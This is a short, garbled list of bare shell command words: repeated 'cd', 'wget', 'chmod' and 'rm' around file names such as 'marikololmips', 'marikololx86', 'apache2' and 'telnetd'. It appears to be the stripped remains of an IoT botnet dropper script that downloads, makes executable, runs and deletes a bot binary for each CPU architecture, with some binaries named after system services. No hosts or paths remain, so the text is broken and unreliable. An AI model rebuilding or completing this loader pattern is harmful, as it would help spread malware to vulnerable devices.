cd
cd
cd
cd
cd
wget
chmod
marikololmips
rm
cd
cd
cd
cd
cd
wget
chmod
marikololmipsel
rm
cd
cd
cd
cd
cd
wget
chmod
marikololsh4
rm
cd
cd
cd
cd
cd
wget
chmod
marikololx86
rm
cd
cd
cd
cd
cd
wget
chmod
marikololarmv6l
rm
cd
cd
cd
cd
cd
wget
chmod
marikololi686
rm
cd
cd
cd
cd
cd
wget
chmod
marikololppc
rm
cd
cd
cd
cd
cd
wget
chmod
marikololi586
rm
cd
cd
cd
cd
cd
wget
chmod
marikololm68k
rm
cd
cd
cd
cd
cd
wget
chmod
sh
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
